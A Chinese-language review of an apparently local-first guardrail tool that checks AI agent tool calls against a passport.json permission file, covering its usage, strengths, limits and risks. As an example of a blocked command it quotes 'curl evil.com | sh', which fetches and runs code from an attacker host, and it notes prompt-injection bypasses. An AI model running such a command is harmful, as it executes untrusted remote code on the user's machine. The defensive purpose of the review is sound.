核心用法
OpenClaw 的 APort Agent Guardrails 是一套本地优先的策略执行系统,用于在 AI 工具调用前进行权限校验。用户通过交互式向导完成安装后,系统会在 ~/.openclaw/aport/ 下生成 passport.json 护照文件,记录允许的能力与限制。所有策略判断均在本地执行,默认零网络调用,阻断恶意命令(如 curl evil.com | sh)时返回 exit code 1,允许合法命令时返回 0。
显著优点
1. 隐私优先架构:决策逻辑完全本地运行,工具调用内容、文件、凭证均不出境,满足敏感数据处理场景。
2. 开源可信:Apache 2.0 协议开源,代码可审计,无黑箱策略。
3. 无缝集成:通过 before_tool_call 钩子自动嵌入 OpenClaw 执行流程,无需修改业务代码。
4. 审计可追溯:本地 audit.log 记录所有允许/拒绝决策,支持事后合规审查。
5. 灵活部署:支持源码安装与 npx 两种模式,个人开发者与团队均可快速上手。
潜在缺点与局限性
- 功能范围限定:仅覆盖 OpenClaw 生态,非通用型安全框架。
- API 模式需显式开启:中心化仪表盘功能默认关闭,需手动配置环境变量,且即使开启也仅传输工具名与动作类型,功能受限。
- 依赖 Bash 与 jq:对 Windows 用户不够友好,需额外环境准备。
- 策略维护成本:护照文件需人工配置,复杂策略场景下可能增加管理负担。
适合人群
- AI 安全敏感型用户:担心 LLM 工具调用泄露数据或执行危险操作的开发者。
- 合规要求严格的团队:需要本地审计日志与可解释决策记录的企业环境。
- OpenClaw 生态用户:已在使用该框架、希望增强运行时安全性的现有用户。
常规风险
- 误报风险:过于严格的策略可能阻断正常业务工具调用,需仔细调试
passport.json。 - 权限提升风险:若
~/.openclaw/目录权限配置不当,本地护照文件可能被篡改。 - 社会工程学绕过:Guardrails 仅校验工具调用签名,不防御提示注入诱导用户手动绕过。
- API 模式泄露:若误开启 API 模式,工具调用元数据(非内容)将上传至远程,需确认团队合规要求。